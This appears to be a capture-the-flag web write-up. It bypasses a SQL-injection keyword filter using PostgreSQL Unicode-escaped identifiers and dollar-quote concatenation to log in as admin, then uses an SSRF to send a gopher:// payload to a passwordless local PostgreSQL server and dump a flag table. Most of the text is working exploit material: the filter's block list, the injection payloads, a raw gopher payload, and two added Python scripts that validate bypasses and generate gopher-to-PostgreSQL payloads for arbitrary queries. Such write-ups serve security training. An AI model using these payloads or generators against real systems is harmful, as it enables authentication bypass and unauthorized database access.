# Wp

Requesting `login.php.bak` returns the source of the login page.

## Bypass waf

The source shows a filter that rejects the following keywords and characters:

```
reg|like|usern|pos|trim|having|admin|adm|select|update|drop|insert|where|union|set|from|chr|ord|ascii|or|and|substr|mid|concat|str|between|load|\*|<|>|\^|;|\.|\?|\\\|-|\)|\(| |~|!|@|\+|👴|👨|👦|coalesce|hex|conv|decode|pg|left|right|for|rep|load|glob|cast|to|limit|in|order
```

The goal is to log in as the `admin` account; the check is on the returned username:

```
if($row['username']=="admin"){
    $_SESSION['login'] = 1;
    echo "<script>window.location.href='dashboard.php';</script>";
}
```

This is done with a few PostgreSQL tricks.

### 1. PostgreSQL Unicode escapes

https://www.postgresql.org/docs/9.2/sql-syntax-lexical.html#SQL-SYNTAX-STRINGS-UESCAPE

`usern` and `pos` are blocked, so the identifiers `username` and `password` cannot be written literally. A `U&"..."` identifier with a custom `UESCAPE` character spells the blocked letter by code point instead: `$0075` is `u`, so `U&"$0075sername"UESCAPE'$'` is the identifier `username` (and `U&"$0073srf"UESCAPE'$'` is `ssrf`). Because the space character is also blocked, the `UESCAPE` clause is written without any whitespace.

Construct the password field as:

password `U&"$0075sername"UESCAPE'$',U&"$0073srf"UESCAPE'$'`

### 2. PostgreSQL string concatenation

PostgreSQL concatenates strings with `||`, and dollar quoting (`$$...$$`) turns `a`, `dmi` and `n` into string literals, so the blocked substrings `admin` and `adm` never appear in the request but the value compared on the server is still `admin`:

username `$$a$$||$$dmi$$||$$n$$`

## ssrf

An SSRF is found. Port 5432 is open, and the PostgreSQL instance behind it accepts connections without authentication.

Set up PostgreSQL locally and capture a client session with Wireshark to obtain the raw wire-protocol bytes, then construct the gopher payload from them:

```
gopher://127.0.0.1:5432/_%00%00%00%20%00%03%00%00%75%73%65%72%00%63%74%66%00%64%61%74%61%62%61%73%65%00%66%6c%34%67%00%00%51%00%00%00%29%73%65%6c%65%63%74%20%2a%20%66%72%6f%6d%20%66%66%66%66%66%6c%6c%6c%6c%6c%61%61%61%61%61%67%67%67%67%67%67%3b%00%58%00%00%00%04
```

Decoded, the selector is three messages back to back: a StartupMessage (length 0x20, protocol 3.0, `user` = `ctf`, `database` = `fl4g`), a simple Query `select * from ffffflllllaaaaagggggg;` (length 0x29), and a Terminate (`X`). No password message is needed because the server lets the `ctf` user in without one.

Note the encoding: every byte is percent-encoded, including the NUL terminators and the big-endian length prefixes, so the URL parser passes the selector through untouched. If the gopher URL is itself submitted as a parameter value, it typically has to be URL-encoded a second time (`%` becomes `%25`) so that the first decoding step does not consume the percent escapes.
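For the WAF bypass section above, the following added example (not code from the original writeup) transcribes the filter's keyword list and shows what PostgreSQL's lexer makes of the two payloads. It assumes the filter is a case-insensitive substring match and reads the `\\\|-` fragment of the regex as a backslash and a dash (`|` itself cannot be blocked, or the `||` payload would never pass); the decoder follows the `U&"..." UESCAPE` rules from the linked PostgreSQL documentation.

```python
import re

# Keyword list from the writeup's WAF, transcribed as literal substrings.
# Assumptions: case-insensitive substring match; the `\\\|-` fragment of the
# original regex is taken as "\" and "-" (the page's own `||` payload shows
# that "|" is not filtered).
WAF_TOKENS = [
    "reg", "like", "usern", "pos", "trim", "having", "admin", "adm", "select",
    "update", "drop", "insert", "where", "union", "set", "from", "chr", "ord",
    "ascii", "or", "and", "substr", "mid", "concat", "str", "between", "load",
    "*", "<", ">", "^", ";", ".", "?", "\\", "-", ")", "(", " ", "~", "!", "@",
    "+", "👴", "👨", "👦", "coalesce", "hex", "conv", "decode", "pg", "left",
    "right", "for", "rep", "glob", "cast", "to", "limit", "in", "order",
]


def waf_blocks(value: str) -> bool:
    """True if the filter would reject this field value."""
    low = value.lower()
    return any(tok in low for tok in WAF_TOKENS)


# U&"body" UESCAPE 'x' -- whitespace before UESCAPE is optional, which matters
# here because the space character is on the block list.
UESCAPE_IDENT = re.compile(r'U&"((?:[^"]|"")*)"\s*UESCAPE\s*\'(.)\'', re.IGNORECASE)


def decode_uescape_identifier(token: str) -> str:
    """Resolve a Unicode-escaped identifier the way PostgreSQL's lexer does:
    x+XXXXXX and xXXXX are code points, xx is a literal escape character."""
    m = UESCAPE_IDENT.fullmatch(token.strip())
    if m is None:
        raise ValueError("not a U&\"...\" UESCAPE identifier")
    body, esc = m.group(1), m.group(2)
    # PostgreSQL forbids hex digits, '+', quotes and whitespace as escape char.
    if esc in "0123456789abcdefABCDEF+'\"" or esc.isspace():
        raise ValueError(f"invalid UESCAPE character {esc!r}")
    e = re.escape(esc)
    pat = re.compile(rf"{e}\+([0-9A-Fa-f]{{6}})|{e}([0-9A-Fa-f]{{4}})|{e}{e}")

    def expand(mm: re.Match) -> str:
        if mm.group(1):
            return chr(int(mm.group(1), 16))
        if mm.group(2):
            return chr(int(mm.group(2), 16))
        return esc  # doubled escape char stands for itself

    return pat.sub(expand, body).replace('""', '"')


def dollar_concat(expr: str) -> str:
    """Evaluate `$$a$$||$$b$$||...`: dollar-quoted literals joined with ||."""
    out = []
    for part in expr.split("||"):
        mm = re.fullmatch(r"\$\$(.*)\$\$", part.strip(), re.DOTALL)
        if mm is None:
            raise ValueError(f"not a dollar-quoted literal: {part!r}")
        out.append(mm.group(1))
    return "".join(out)


if __name__ == "__main__":
    # The two payloads from the writeup.
    password = "U&\"$0075sername\"UESCAPE'$',U&\"$0073srf\"UESCAPE'$'"
    username = "$$a$$||$$dmi$$||$$n$$"
    for label, v in (("admin", "admin"), ("username", "username"),
                     ("password payload", password), ("username payload", username)):
        print(f"{label:17} blocked={waf_blocks(v)}")
    print(decode_uescape_identifier("U&\"$0075sername\"UESCAPE'$'"))
    print(dollar_concat(username))
```

The decoder is the useful half: when you build your own escaped identifiers, running them through it confirms that the lexer will see the column name you intend before you spend requests on the target.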
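For the SSRF section above, the following added example (not code from the original writeup) builds the gopher payload from the PostgreSQL wire protocol instead of copying bytes out of Wireshark: a StartupMessage, a simple Query and a Terminate, percent-encoded byte by byte. The user, database and query are the ones visible in the page's payload; the host, port and the parameter-wrapping helper are assumptions.

```python
import struct
from urllib.parse import quote

# Protocol 3.0 is encoded as major << 16 | minor.
PG_PROTOCOL_3_0 = (3 << 16) | 0


def startup_message(user: str, database: str) -> bytes:
    """StartupMessage: int32 length (includes itself), int32 protocol,
    then key\0value\0 pairs and a final \0. It has no type byte."""
    params = b"".join(
        k.encode() + b"\0" + v.encode() + b"\0"
        for k, v in (("user", user), ("database", database))
    )
    body = struct.pack("!I", PG_PROTOCOL_3_0) + params + b"\0"
    return struct.pack("!I", len(body) + 4) + body


def simple_query(sql: str) -> bytes:
    """Query ('Q'): int32 length (includes itself, not the type byte), sql\0."""
    payload = sql.encode() + b"\0"
    return b"Q" + struct.pack("!I", len(payload) + 4) + payload


def terminate() -> bytes:
    """Terminate ('X'): just the type byte and a length of 4."""
    return b"X" + struct.pack("!I", 4)


def to_gopher_url(host: str, port: int, raw: bytes) -> str:
    """Gopher selector: the byte after '/' is the item type ('_' is a common
    dummy) and everything after it is sent verbatim once percent-decoded.
    Every byte is encoded so NULs and length prefixes survive URL parsing."""
    return f"gopher://{host}:{port}/_" + "".join(f"%{b:02x}" for b in raw)


def build_pg_gopher(user: str, database: str, sql: str,
                    host: str = "127.0.0.1", port: int = 5432) -> str:
    """Startup + Query + Terminate in one TCP send. Works only when the server
    authenticates the user with trust, since no password message follows."""
    raw = startup_message(user, database) + simple_query(sql) + terminate()
    return to_gopher_url(host, port, raw)


def wrap_in_query_param(url: str) -> str:
    """Second encoding layer for when the gopher URL travels inside a URL
    parameter: the '%' signs must become '%25' or the first decode eats them."""
    return quote(url, safe="")


if __name__ == "__main__":
    url = build_pg_gopher("ctf", "fl4g", "select * from ffffflllllaaaaagggggg;")
    print(url)
    print("?url=" + wrap_in_query_param(url))
```

Changing `sql` to a different statement regenerates the length prefix automatically, which is the step that goes wrong when the bytes are edited by hand in a captured payload.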